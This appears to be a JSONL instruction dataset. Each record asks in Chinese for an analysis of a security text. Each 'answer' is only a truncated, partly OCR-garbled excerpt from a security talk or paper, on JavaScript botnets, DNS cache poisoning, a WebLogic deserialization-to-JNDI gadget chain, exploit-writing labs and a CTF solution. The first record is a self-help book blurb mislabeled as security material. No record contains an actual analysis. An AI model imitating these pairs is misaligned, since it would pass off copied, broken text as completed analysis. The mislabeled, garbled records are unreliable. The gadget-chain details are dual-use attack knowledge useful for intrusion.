个 史蒂芬拉本斯基国际广播电视协会执 行理事 史蒂芬柯维的著作传授着力量信念与感受 书中所谈到的人生法则的概念和实现方法为有效沟 通提供了一个基础作为一名教育工作者这本书 将成为我藏书室中又一本重要的参考文献 威廉柯尔美国犹他州高等教育委员会 委员 史蒂芬柯维真是个了不起的人物他的著作 思想深刻且充满人文主义关怀 高效能人士的七个 习惯一本书就顶得上一屋子成功学书籍它真的 改变了我的人生 [ 高效能人士的七个习惯 ]   ~ 10 ~ 肯布兰佳一分钟经理作者 你所能形成的最好习惯就是不断学习并掌握 史蒂芬柯维的处世智慧他能将他所说的话变成 现实他的书自能让你永远臵身于成功者的圈子之 中 丹尼斯威特利博士全美最杰出激励大 师之一畅销书成功心理学作者 这真是一项伟大的贡献!柯维博士总结了成功 人士的各种习惯并将其编制成为一套简单易学且 行之有效的教程奉献给大家我们从此获得了现实 美国梦的蓝图 查尔斯坎菲尔德畅销书顶级执行者 作者 [ 高效能人士的七个习惯 ]   ~ 11 ~ 知识是通往成功的安全捷径史蒂芬柯", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOwning Bad Guys {& Mafia} with JavaScript Botnets Chema Alonso (chema@informatica64.com @chemaalonso) and Manu The Sur (mfernandez@informatica64.com) Informatica 64 (http://www.informatica64.com) Abstract: Man in the middle attacks are common and dangerous. Using a TOR connection or an Anonymous Proxy Server implies accepting a man in the middle schema in our Internet Connection. In this paper we describe how easily a JavaScript Botnet can be constructed and what are the risks. Moreover, we describe, with samples, what kind of people are using this kind of services. Botnets Building a botnet is an idea that everyone working in security has thought about. c. The idea of having a control panel that allows you to manage the behaviour of thousands of machines is tempted  However, this process is definitively a step to the side of cybercrime, and must be very careful not to do. Despite this, the proof of concept I will relate in this article has to do with this idea, to make a botnet, but with a complete different philosophy. First, on our proof of concept work that is done is completely passive, it means, there is no intention to control the lives of anyone, but to study the risks of certain services that have become too popular, such as Anonymous Proxies and TOR networks. All this work is intended to alert of the risks to which may be incurred by the mere fact of following one of the many tutorial available on Internet about anonymity. That said, I will tell you the process we followed to make a botnet to control what they do and how they do, that bad guys of Internet. Man In The Middle Before describing the architecture is necessary to review the concept of Man in the Middle techniques. In the networking field, Man in the Middle attacks are popular and effective. Typical cases in IPv4 networks with ARP Spoofing techniques or Rogue DHCP, in IPv6 networks with ICMP Spoofing attacks or SLAAC, or other cases such as DNS Poisoning are widely used in schemes to steal creden", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWelcome Home! Internet Open Telemetry Martin Hron security researcher HITCON 2018 Buzzword 2 A word or phrase which has become fashionable or popular, or sounds technical or important and is used to impress people 3 So lets talk about IoT What is IoT? 4 Flashback: How it has started 5  Make my house smart. DYI way. Flashback: How it has started 6  Many smart devices or devices that can be made smart  7 Babylon of standards 8  You can go two ways:  use one vendor and one solution, one cloud  you have many devices from different vendors or even dumb devices which need to be made smart 9 Babylon of standards 10  Physical layer / data link  Bluetooth  RS232, RS485, CAN, eBUS  WiFi, Ethernet  ZigBee  433, 866 MHz  and many others Babylon of standards 11  Transport / application layer  Textual data  JSON  HTTP  XML  Binary oriented protocols  Proprietary protocols 12 Message Queue Telemetry Transport - MQTT 13  publisher - subscriber model  payload agnostic  topics can be organized in tree like structure  when subscribing wildcards can be used  usually operates through TCP on port 1883  supports last will and persistent topics MQTT topics 14  Examples of topics: /house/attic/light /house/basement/door /house/basement/light  Tree like organized structure. When subscribing, you can use wildcards. # for all levels from here down the tree or + for any single level.  Subscription to /house/+/light delivers all light topics in any room  Subscription to only # delivers every topic published by anyone to this MQTT server/broker. MQTT Broker use case in smart home 15 MQTT Broker sensor (switch) sensor (door contact) sensor (thermometer) smart breaker box with MQTT bridge actor (smart bulb) actor (garage doors) actor/sensor (heating unit) bridge sensor (switch) actor (dumb bulb) bridge bridge simple wire ZigBee ETH / WiFi eBUS bussines logic Typical implementation 16  Various smart and dumb devices bridged to MQTT  One namespace of topics spans whole building  MQTT broker, Mosquitt", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAWVS 也有一个插桩模式我们也来试用一下先安装好awvs // pull 拉取下载镜像 docker pull secfa/docker-awvs // 将Docker的3443端口映射到物理机的 13443端口 docker run -it -d -p 13443:3443 secfa/docker-awvs // 容器的相关信息 awvs13 username: admin@admin.com awvs13 password: Admin123 AWVS版本13.0.200217097 1.开启插桩扫描 开启 AcuSensor 如下两张图 图1 未开启AcuSensor 图2 开启AcuSensor参照图中所示要使用插桩扫描必须保持AcuSensor为选中状态 2.准备桩点jar包和切面jar包 下图按钮就是桩点下载地址 切面jar包下载的地址是 https://repo1.maven.org/maven2/org/aspectj/aspectjweaver/1.9.5/aspectjweaver-1.9.5.jar 3.安装桩点jar包和切面jar包 把这两个jar包放到tomcat的lib目录中 别忘了要重命名切面jar包为aspectjweaver.jar 4.加入启动代码 在catalina.sh中cygwin=false这行上面加入以下代码 请依照实际情况修正jar包的路径 这样启动的java进程就是可以执行插桩扫描的应用系统然后就是正常的开始扫描就可以了 5.扫描结果 带有AcuSensor图标的就是插桩测试出来的结果以及 (AcuSensor)文字标识的都是插桩扫描出来的结果 很明显插桩扫描出来的结果更为详细甚至能给出执行的sql语句 图1 JAVA_OPTS=\"$JAVA_OPTS -javaagent:/home/test/apache-tomcat-8.5.61/lib/aspectjweaver.jar -Dacusensor.debug.log=ON\" 图2 其他springboot的部署 可以参照 官方链接使用部署swagger进行统一的插桩扫描发现系统隐患 总结 awvs相对netsparker配置方便适合对burp等抓包工具的日志文件或swagger的接口列表文件进行检测 谢谢 FROM openjdk:8-jdk-alpine COPY AcuSensor.jar AcuSensor.jar COPY aspectjweaver.jar aspectjweaver.jar COPY myspringapp.jar myspringapp.jar EXPOSE 8080 CMD java -javaagent:aspectjweaver.jar -Dacusensor.debug.log=ON -Dloader.path=AcuSensor.jar -cp myspringapp.jar o", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDeveloping Multi-Agency Interoperability Communications Systems: User's Handbook Applicable To: ACU-1000 Modular Interface/Interconnect System And TRP-1000 Transportable Radio Interconnect System ACU/TRP-1000 Handbook Page ii Developing Multi-Agency Interoperability Communication Systems: Users Handbook ACU-1000 Modular Interface/Interconnect System And TRP-1000 Transportable Radio Interconnect System Presented by: Office for Domestic Preparedness This project was supported by Contract GS-10F-0088I/2001BF505TO02, Task Order 2001TO046, awarded by the U.S. Department of Justice, Office of Justice Programs to Community Research Associates, Inc. The As- sistant Attorney General, Office of Justice Programs, establishes the policies and priorities, and manages and coordinates the activities of the Office of Justice Programs, Bureau of Justice Statistics, National Institute of Justice, Office of Juvenile Justice and Delinquency Prevention, and the Office for Victims of Crime. Points of view in this document are those of the author and do not necessarily represent the official position of the U.S. Department of Justice and Community Research Associates, Inc. ACU/TRP-1000 Handbook Page iii Foreword The Office of the Assistant Attorney General, Office of Justice Programs (OJP) is providing funds through the Office for Domestic Preparedness (ODP) State Domestic Preparedness Equipment Program for the purchase of specialized equipment to help enhance the capabilities of State and local units of government to respond to acts of terrorism involving chemical and biological agents, as well as radiological, nuclear, and explosive de- vices. This handbook is the result of a developed and focused effort by the ODP to address interoperability and is intended to enhance communications among the numerous agencies who would respond to large-scale terror- ism incidents or emergencies. To further enhance that effort, the ODP provided more than 50 ACU/TRP-1000 systems to approximately 10 juri", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nScylla & 1.0 Alpha (101% Colombiano) http://www.2secure.org Sergio Valderrama (flacman at cuteam dot org) Carlos Rodriguez (iker at cuteam dot org) Special thanks to: RPM (Our designer, and webshell creator), Zealot (for his help with charybdis), Tronador (he build pieces of mail modules) Download: You would be able to download the source only (with compiling instructions) from here: http://code.google.com/p/scylla-v1/ (will be uploaded the 22 of July) Abstract When there's no technical vulnerability to exploit, you should try to hack what humans left for you, and believe me, this always works. Scylla provides all the power of what a real audit, intrusion, exclusion and analysis tool needs, giving the possibility of scanning misconfiguration bugs dynamically. Scylla aims to be a better tool for security auditors, extremely fast, designed based on real scenarios, developed by experienced coders and constructed with actual IT work methods. The words Configuration Tracer are the best definition for Scylla, a tool to help on IT audits. Introduction This document is a reference manual about what Scylla is, and what its capabilities are. This document will show the user a hypothetical scenario that shows what he/she is able to do when Using Scylla and basic explanation of each one of its modules and its features. Scylla is not solely meant to be an exploitation tool or a tool to discover vulnerabilities within applications, but rather as a method to hack and patch human stupidity, such as common errors or flaws unintentionally put in service configuration. Scylla is built over an extremely fast and reliable core, with anti-anti Brute force techniques, error recovery protocols, and a lot of speedup tricks with most manual (and other types of attacks unknown to the user) being coded to avoid repetitive tasks. BTW, if you havent read well, this is 1.0a version, and the a comes from A lot of work to do, A lot of bugs (I think) and A lot of testing left, and we will appreciate", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n- 2 - u Dongsung Kim u Graduate Student, Sungkyunkwan University u @kid1ng / https://kidi.ng u Hyoung-Kee Choi u Professor, Sungkyunkwan University u https://hit.skku.edu/~hkchoi - 3 - u Motivation u Tizen Security Internals u Dan the D-Bus Analyzer u Privilege Violations u Conclusion 1 - 5 - u Samsungs smartwatch products: S2, S3, Sport  Track fitness; control smart devices; receive calls, texts, and emails; pay with NFC  Bluetooth only or with dedicated cellular LTE  App marketplace: Samsung Galaxy Apps  Development with Tizen SDK and Samsung SDK u Sensitive information and high privileges  Powerful processor and tracking sensors  Personal data from users smartphone  Contacts, calendar, location, email, notification,   Access to privileged actions must be controlled  Sending a quick reply, obtaining the GPS location,  Image: Samsung - 6 - u Linux-based Open source operating system  Maintained by the Linux Foundation  Mainly developed by Samsung u Shipped with many of Samsungs products  Smartwatches, wearables, smartphones, cameras, smart TVs, home appliances,  u Samsung Gear firmware  Tizens open source components  Operating system, system services,   Samsungs closed source components  Drivers, system services, applications,  Image: Tizen Project, a Linux Foundation Project - 7 - u May 2015: Ajin Abraham Hacking Samsungs Tizen: The OS of Everything @ HITBSecConf  Over-privileged apps, no DEP, broken ASLR, WebKit vulns u Apr 2017: Amihai Neiderman Breaking Tizen @ Security Analyst Summit  40 0-day vulnerabilities in Tizen and Tizen Store u Jul 2017: PVS-Studio 27 000 Errors in the Tizen Operating System  900 code errors in a portion of Tizen source code - 8 - u Sungkyunkwan University is funded and operated by the Samsung Foundation. 2 - 10 - u Files, Directories, UNIX Sockets, Utilities u Applications  Use Tizen APIs to access the subsystems  e.g., Frameworks, Services,  u Services  Special privileged daemons dedicated for a resource  e.g., Wi-Fi, Bluetooth, GPS, ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 CVE-OLOO-ONPSL 反序列化利链JNDI注 10.3.6.0.0 12.1.3.0.0 12.2.1.3.0 12.2.1.4.0 测试版本12.2.1.4.0 之前有师傅的章已经分析过了给出调堆栈 漏洞介绍 漏洞评级 影响范围 安全版本 漏洞分析 12.2.1.4.0 2 从这调链能看出他基本都是JDK或weblogic个包的没有像2555/2883那样还需要依赖 coherence能提不同版本的利兼容性 前测试下来12.1.3/12.2.1.3/12.2.1.4个包就能打 这记录下的调试记录吧便后续查阅 点还是之前的 javax.management.BadAttributeValueExpException.readObject 从val变量取出对象这变量是 FileSessionData 对象然后调他的 toString() Java 复制代码 javax.management.BadAttributeValueExpException.readObject() weblogic.servlet.internal.session.SessionData.toString() weblogic.servlet.internal.session.SessionData.isDebuggingSession() weblogic.servlet.internal.session.SessionData.getAttribute() weblogic.servlet.internal.session.SessionData.getAttributeInternal() weblogic.servlet.internal.session.AttributeWrapperUtils.unwrapObject() weblogic.servlet.internal.session.AttributeWrapperUtils.unwrapEJBObjects () weblogic.ejb.container.internal.BusinessHandleImpl.getBusinessObject() weblogic.ejb20.internal.HomeHandleImpl.getEJBHome() javax.naming.Context.lookup() 1 2 3 4 5 6 7 8 9 10 3 FileSessionData 是继承 SessionData 这的toString没被重写所以调的是类的进 调 this.isDebuggingSession() registry.isProductionMode() 没法在本地反序列化测试因为涉及到些变量需要 weblogic运时初始化所以这没法本地调试 接着会调 this.getAttribute 获取 wl_debug_session 4 这 getSecurityModuleAttribute 返回是null因为他是 name=\"weblogic.formauth.tar geturl\" 才有值所以调 this.getAttributeInternal this.attributes 是个Map实现类是ConcurrentHashMap获取 wl_debug_session 的 value这是 AttributeWrapper 对象 接着调 AttributeWrapperUtils.unwrapObject 解封装 5 AttributeWrapper 对象封装的是 BusinessHandlerImpl 类解封装后还需要判断 wrappe r.isEJBObjectWrapped() 是否为true才能继续调 unwrapEJBObjects 所以需要动 setEJBObjectWrapped(true) 6 unwrapEJBObjects 有四个分如果是BusinessHandle的实现类才能调 getBusinessO bject() PS: 这个部分其实BusinessHandleHomeHandle和Handle三个都能触发任选其 this.homeHandle 是 HomeHandleImpl 类然后调 getEJBHome() 7 最终到了sink点 ctx.lookup 这有两个变量要设置this.serverURL和this.jndiName就是 JNDI请求那套 这个版本有些不同 在 SessionData.getAttributeInternal 原本是先调 AttributeWrapperUtils.unw rapObject ,然后才是判断unwrappedObject属于哪个接进转换 10.3.6跳过中间步骤直接判断 10", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n! 1! WRITING!YOUR!FIRST!EXPLOIT! LECTURE!NOTES! ! Robert!Olson! Lecturer! Dept.!of!Computing!&!Info!Sciences! SUNY!at!Fredonia! olsonr@fredonia.edu! @nerdprof! https://github.com/nerdprof/Writing-Your-First-Exploit! ! ! ! ! ! 1. Laboratory!Setup! a. Virtual)Machines) i. Windows!VM! ! ! ! ! A!Windows!virtual!machine!can!be!downloaded!from!the!! ! ! ! following!link:! ! ! ! https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/! ! ! ! ! ! ! ! ! Note:!Some!students!reported!problems!when!using!a!! ! ! ! Windows!10!virtual!machine!during!the!Circle!City!Con!2016!! ! ! ! workshop.! ! ii. Kali!VM! ! ! ! ! Kali!Linux!!or!a!Kali!Linux!virtual!machine!-!can!be!! ! ! ! ! downloaded!from:! ! ! ! https://www.kali.org/downloads/! ! b. Software)Installs) i. Downloading!VulnServer!on!Windows!VM! ! ! ! ! VulnServer!can!be!downloaded!at:! ! ! ! http://www.thegreycorner.com/2010/12/introducing-vulnserver.html! ! ii. Downloading!Immunity!on!Windows!VM! ! ! ! ! Immunity!Debugger!can!be!downloaded!at:! ! ! ! http://debugger.immunityinc.com/ID_register.py! ! ! 2! iii. Downloading!mona.py!on!WindowsVM! ! ! ! ! The!mona.py!script!can!be!downloaded!from:! ! ! ! https://github.com/corelan/mona/blob/master/mona.py! ! ! ! ! Once!downloaded,!it!should!be!placed!at:! ! ! ! ! C:\\Program!Files\\Immunity!Inc\\Immunity!Debugger\\PyCommands! ! iv. Downloading!arwin.exe!on!Windows!Vm! ! ! ! ! The!arwin!application!can!be!downloaded!from:! ! ! ! http://www.fuzzysecurity.com/tutorials/expDev/tools/arwin.rar! ! 2. Buffer!Overflows!in!C! a. Simple)C)Programming) i. Printf! ! ! ! ! ! printf()!is!a!function!that!prints!data!to!the!screen,!often!using!! ! ! ! substitution!symbols.! ! ! ! ! printf(Hello);)would!print!Hello!to!the!screen!while!the!lines:! ! ! ! ! char)name[5])=)Rob;) ) ) ) printf(Hello)%s,)name);) ) ! ! ! would!cause!Hello)Rob!to!be!printed!to!the!screen.! ! ! ! ! ii. Strcpy! ! ! ! ! strcpy()!is!a!function!that!copies!one!character!array!into!! ! ! ! another.!!This!function!does!not!chec", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSentient Storage: Do SSDs have a mind of their own? Tom Kopchak :: @tomkopchak About me Why we're here  Current forensic practices for working with hard drives are well-defined  Solid state drives behave differently and present new challenges  This presentation will explore these differences in detail Forensics: Traditional Hard Drives What do we already know? Data deleted on a traditional hard drive is not truly deleted and can often be recovered quite easily What do we already know? Quick formatting a hard drive doesn't actually delete or purge data from the drive What do we already know? In order for data to be deleted from a traditional hard drive, it must be completely overwritten at least once What do we already know? Traditional hard drives do not manipulate or optimize incoming data What do we already know? Traditional hard drives do not change the physical location of a block of data independently of the operating system What do we already know? These behaviors are consistent across all traditional hard drives, regardless of manufacturer, capacity, or firmware revision Solid State Drives change all of this Let's talk about flash memory  Flash memory is where data is stored on a solid state drive  An SSD will be composed of a number of flash memory chips to reach its desired capacity  The drive controller is the glue that holds all of this together  Commonly referred to as the Flash Translation Layer (FTL) Drive Types Compared Physical Flash Architecture  There are different types of flash memory - single level cell (SLC) and multi-level cell (MLC)  SLC - one bit per cell: 0 or 1  MLC - two bits per cell: 00, 01, 10, or 11  A blank cell is represented in all 1s Physical Flash Architecture  Pages are the smallest addressable unit in a flash memory cell  Pages cannot be overwritten, due to the fact that erasing them might modify adjacent cells in a block  Only entire blocks are erased at a time Erasing Flash Blocks  When data is deleted, the blocks containing this d", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWHEN THE SECRETARY OF STATE SAYS: PLEASE STOP HACKING US David An Former U.S. Diplomat Bureau of Political-Military Affairs U.S. State Department Figures: Left, historical photo of 1973 Paris Peace Accords to restore peace following the Vietnam (American) War. Right, Reuters, May 2015, Iran negotiates with the five members of UN Security Council plus Germany. David T. An 2 Real-Time Cyber Attack Map David T. An 3 Figure: Live attack map sample from September 8, 2014. Norse Corporation. See the current live cyber attack map on your smart phone or computer: http://map.norsecorp.com/ DDoS shuts down Facebook David T. An 4 Figure: On June 19, 2014, a massive distributed denial of service (DDoS) attack appears to originate from China and shut down Facebook that afternoon for half an hour. Youtube. United Nations General Assembly David T. An 5 U.S.-China Strategic and Economic Dialogue David T. An 6 Australia-U.S. Ministerial Meeting David T. An 7 Cyber diplomacy Key points: Insight on senior bilateral dialogues Attribution problem Disclosure dilemma Recommendations for white hat hackers, private companies, and the U.S. government David T. An 8 Cyber weapons and cyber espionage Politics Economics Military David T. An 9 Types of dialogues Senior level discussions Subject matter expert talks Intelligence-policy hybrid talks David T. An 10 Cyber as topic in diplomacy How does cyber security become a topic? News Intelligence sources White House, Pentagon, State leads Stakeholder office edits and clears Desk officer Precedence David T. An 11 Roadblocks in senior dialogues Attribution problem Disclosure dilemma David T. An 12 Figure: U.S. hit by 5840 attacks within a 45 minute span around June 2014. The 5 Ws plus how Political science and area studies Technical skills David T. An 13 State versus non-state actors State actor targets state actor: Allegedly Stuxnet State targets non-state actor: Sony hack due to The Interview movie Non-state actor targets state actor: Non-state ac", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nhdparm === 显示与设定硬盘的参数 ## 补充说明 **hdparm命令** 提供了一个命令行的接口用于读取和设置IDE或SCSI硬盘参数 ### 语法 ```shell hdparm(选项)(参数) ``` ### 选项 ```shell -a<快取分区>设定读取文件时预先存入块区的分区数若不加上<快取分区>选项则显示目前的设定 -A<0或1>启动或关闭读取文件时的快取功能 -c<I/O模式>设定IDE32位I/O模式 -C检测IDE硬盘的电源管理模式 -d<0或1>设定磁盘的DMA模式 -f将内存缓冲区的数据写入硬盘并清除缓冲区 -g显示硬盘的磁轨磁头磁区等参数 -h显示帮助 -i显示硬盘的硬件规格信息这些信息是在开机时由硬盘本身所提供 -I直接读取硬盘所提供的硬件规格信息 -k<0或1>重设硬盘时保留-dmu参数的设定 -K<0或1>重设硬盘时保留-APSWXZ参数的设定 -m<磁区数>设定硬盘多重分区存取的分区数 -n<0或1>忽略硬盘写入时所发生的错误 -p<PIO模式>设定硬盘的PIO模式 -P<磁区数>设定硬盘内部快取的分区数 -q:在执行后续的参数时不在屏幕上显示任何信息 -r<0或1>:设定硬盘的读写模式 -S<时间>:设定硬盘进入省电模式前的等待时间 -t;评估硬盘的读取效率 -T平谷硬盘快取的读取效率 -u<0或1>在硬盘存取时允许其他中断要求同时执行 -v显示硬盘的相关设定 -w<0或1>设定硬盘的写入快取 -X<传输模式>设定硬盘的传输模式 -y使IDE硬盘进入省电模式 -Y使IDE硬盘进入睡眠模式 -Z关闭某些Seagate硬盘的自动省电功能 ``` ### 参数 设备文件指定id驱动对应的设备文件名 ### 实例 显示硬盘的相关设置 ```shell hdparm /dev/sda /dev/sda: IO_support = 0 (default 16-bit) readonly = 0 (off) readahead = 256 (on) geometry = 19457柱面数/255磁头数/63扇区数, sectors = 312581808总扇区数, start = 0起始扇区数 ```shell 显示硬盘的柱面磁头扇区数 ```shell hdparm -g /dev/sda /dev/sda: geometry = 19457柱面数/255磁头数/63扇区数, sectors = 312581808总扇区数, start = 0起始扇区数 ``` 测试硬盘的读取速度 ```shell hdparm -T /dev/sda /dev/sda: Timing cached reads: 4684 MB in 2.00 seconds = 2342.92 MB/sec ``` 测试硬盘缓存的读取速度 ```shell hdparm -T /dev/xvda /dev/xvda: Timing cached reads: 11154 MB in 1.98 seconds = 5633.44 MB/sec ``` 检测硬盘的电源管理模式 ```shell hdparm -C /dev/sda /dev/sda: drive state is: standby [省电模式] ``` 查询并设置硬盘多重扇区存取的扇区数以增进硬盘的存取效率 ```shell hdparm -m /dev/sda hdparm -m #参数值为整数值如8 /dev/sda ``` **附硬盘坏道修复方法** ```shell 检查smartctl -l selftest /dev/sda 卸载umount /dev/sda* 修复badblocks /dev/sda ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAre$we$creating$incidents? August$26,$2015$ 在 臺北$ Shin$Adachi,$CISSP,$CISM,$CISA,$PMP Shin$Adachi,$CISSP,$CISM,$CISA,$PMP 0 Disclaimer  The$presentation$itself,$and$the$views$and$ opinions$expressed$by$the$presenter$therein$do$ NOT$reflect$those$of$any$of$my$affiliations$at$all.$  NONE$of$such$affiliations$above$thereof$assumes$ any$legal$liability$or$responsibility$for$the$ presentation.$ Shin$Adachi,$CISSP,$CISM,$CISA,$PMP 1 Cuckoos$Egg Shin$Adachi,$CISSP,$CISM,$CISA,$PMP 2 Source:$ http://www.amazon.com/CuckoosREggRTrackingRComputerREspionage/dp/1416507787$ Cuckoos$Egg ....eventually$realized$that$the$unauthorized$user$ was$a$hacker$who$had$acquired$root$access$to$the$ LBL$system$by$exploiting$a$vulnerability$in$the$ movemail$function$of$the$original$GNU$Emacs.$ Shin$Adachi,$CISSP,$CISM,$CISA,$PMP 3 Authentication+Breach Source:$Wikipedia:$http://en.wikipedia.org/wiki/The_Cuckoo%27s_Egg$ Privilege+Escalation Vulnerability+Exploited! Cuckoos$Egg  Published$in$1989$  Story$on$August$1986$ Shin$Adachi,$CISSP,$CISM,$CISA,$PMP 4 Source:$Wikipedia:$http://en.wikipedia.org/wiki/The_Cuckoo%27s_Egg$ QUESTION$ Shin$Adachi,$CISSP,$CISM,$CISA,$PMP 5 Why$do$we$STILL$have$the$same$ problems$after$almost$30$years? Inventory$and$Lifecycle$management Source:$$Nekojin$(ねこじん様)$ Shin$Adachi,$CISSP,$CISM,$CISA,$PMP 6 Do$we$know$ALL$we$have$up$to$date,$or$$ are$legacies,$zombies,$or$ghosts$still$alive?$ Inventory$and$Lifecycle$management Source:$NetMarketShare,$July$2015:$$ http://www.netmarketshare.com/operatingRsystemRmarketRshare.aspx?qprid=10&qpcustomd=0 Shin$Adachi,$CISSP,$CISM,$CISA,$PMP 7 Are$legacies,$zombies,$or$ghosts$still$alive?$ Source:$Microsoft:$$ https://www.microsoft.com/enRus/serverRcloud/products/windowsRserverR2003/ Inventory$and$Lifecycle$management Shin$Adachi,$CISSP,$CISM,$CISA,$PMP 8 Are$legacies,$zombies,$or$ghosts$still$alive?$ Source:$Microsoft:$$ https://technet.microsoft.com/enRus/library/security/ms15R078.aspx Inventory$and$Lifecycle$management Shin$Adachi,$CI", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 DNSPD: Entrap Botnets Through DNS Cache Poisoning Detection p1t1r HITCON 2010 2 自介  Hi, this is p1t1r  資安背景  Rootkit  Web  Network  DNS spoofing 3 DNS攻擊  DNS Cache Poisoning攻擊  很危險的東西迄今尚未被解決  你上的任何網站都有可能是攻擊者的網站  防禦機制  一大堆  不過預設的DNS環境是未受保護的 4 DNSPD  防禦順便抓 Botnet  Botnet 正夯 !!!  問題  這個防禦機制夠穩當嗎?  要看攻擊者的人品  其他機制也可以抓要你何用?  好像可以快一點準一點  應該還有不少問題...  . !! 5 DNS 簡介  功用  將domain name 對應至 IP Address(es)  www.google.com <-> 74.125.153.103, , etc.  特點  大多採用UDP連線  快  先到的答案就是正確的答案  (?) 6 DNS 結構  Domain Name Space  Name Server  儲存/管理 特定的domain name  Resolver (cache server)  暫存之前查詢過的資料(domain name & IPs)方便快速回應  保存資料直到 TTL 過期  攻擊者的主要目標!!! 7 DNS 運行方式 8 DNS Resolver 面對的威脅  UDP封包可以偽造來源IP  難以認證資料的可信度  Resolver 如何驗證資料正確性?  答案必須對應之前提出的問題  來源IP 要符合  Port Number 要符合  Transaction ID 要符合 9 DNS Cache Poisoning 攻擊  攻擊目標 1. 先選 DNS Cache主機 (Resolver)  Google Public DNS - 8.8.8.8 2. 再選 特定domain  例如: 將 blog.hitcon.org 的IP改成 攻擊者的IP  攻擊發起時機  目標domain的資料不存在Resolver的cache中  Resolver向外部name server發出詢問而且尚 未收到答案前 10 傳統 DNS Cache Poisoning 攻擊 www.google.com ? 相信我. 你要的答案是 115.115.115.115 實際上 www.google.com: 64.233.183.99 64.233.183.103 64.233.183.104 64.233.183.105 ............... Attack end Attack begin 11 傳統攻擊之缺點  每次失敗都要等! 等! 等!  等 TTL過期  若是TTL很長  三秒捕魚兩天曬網 12 Dan Kaminsky  Black Hat USA 2008  DNS Cache Poisoning Attack  不用再為TTL煩惱了 !  隨時可以發起攻擊  想打多久也隨便你  適用BIND9任何版本  不過難度不同  v9.4.2之後增加了random port 13 Kaminsky 效應 : DNSSEC熱銷 From: Deploying and Monitoring DNS Security (DNSSEC) 14 Kaminskys Poisoning Attack ..... 1 Time interval 2 3 Malicious 4 Client Resolver Authoritative name server 我是 www.google.com 我來自115.115.115.115 你要找的答案 並不存在 請相信我喔~ 我是ns1.google.com 來自216.239.32.10 你要找的答案 並不存在 千萬別問 www.google.com 改問 123.google.com? 1234.google.com?  99999.google.com?  15 Kaminsky攻擊封包 16 數學公式  攻擊成功機率  RFC 5452  Poisoning 成功機率  打了很多回合至少成功一次的機率  帶入參數    W  T A S I P N R W P / CS * * * 1 1 1 1 P           *P *I N W *R PS   T W  R / CS *64000*65536 5.2 * 1.0 1 1 P        17 攻擊模擬 0 0.1 0.2 0.3 0.4 0.5 0.6 0.7 0.8 0.9 1 0 5", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Where no man has GOne before! * Category: Reverse Engineering * 300 Points * Solved by the JCTF Team ## Description > In this simple challenge, you need to break the protection in order to extract the flag > > http://revengme.challenges.bsidestlv.com/revengme The link contained a binary file. ## Solution Let's start by running the binary: ```console root@kali:/media/sf_CTFs/bsidestlv/Where_no_man_has_GOne_before# ./revengme Enter your password:test Don't Worry, Relax, Chill and Try harder ``` We need to enter a password. Time to view the disassembly. Since this is a golang binary, we'll use the [golang_renamer.py](https://github.com/ghidraninja/ghidra_scripts) script to restores function names from the stripped Go binary. After the dust from running the script settles, we can take a look at the `main.main` implementation. It's long and complicated, but a single function call stands out: ```c if ((lVar9 == lVar7) && (runtime_memequal_4023F0 ((char)pplVar6,(char)puVar5,(char)local_118,uVar3,in_R8B,in_R9B,local_118,uVar8, lVar7,(char)uVar8), uVar2 = extraout_DL_05, (char)uVar8 != '\\0')) { local_f0 = 0x1e; main_ObfStr_488AF0(pplVar6,puVar5,extraout_DL_05,uVar3,in_R8B,in_R9B,&local_18c,0x1e,0x1e,uVar8, lVar9); runtime_convTstring_408B60 ((char)pplVar6,(char)puVar5,extraout_DL_06,(char)uVar8,in_R8B,in_R9B,uVar8,lVar9, local_f0); local_f8 = &DAT_0049a600; fmt_Fprintln_4822C0(pplVar6,(undefined *)puVar5,extraout_DL_07,0x60,in_R8B,in_R9B, &PTR_DAT_004d3a60,DAT_0055b7f0,&local_f8,1,1,lVar10,local_1d8, in_stack_fffffffffffffe30); return; } ``` A single `memequal` call in a program that requests a password? That's worth a breakpoint. ```console gdb-peda$ b *0x00488e99 Breakpoint 2 at 0x488e99 gdb-peda$ r Starting program: /media/sf_CTFs/bsidestlv/Where_no_man_has_GOne_before/revengme [New LWP 1766] [New LWP 1767] Enter your password:aaaaaaaaaa RAX: 0xc00001c0f0 (\"BSidesTLV{revenge is best served cold}\") RBX: 0x26 ('&') RCX: 0xa ('\\n') RDX: 0x26 ('&') RSI: 0xc00001c0c0 (\"BSide", "category": "text_analysis", "source": "security_papers"}
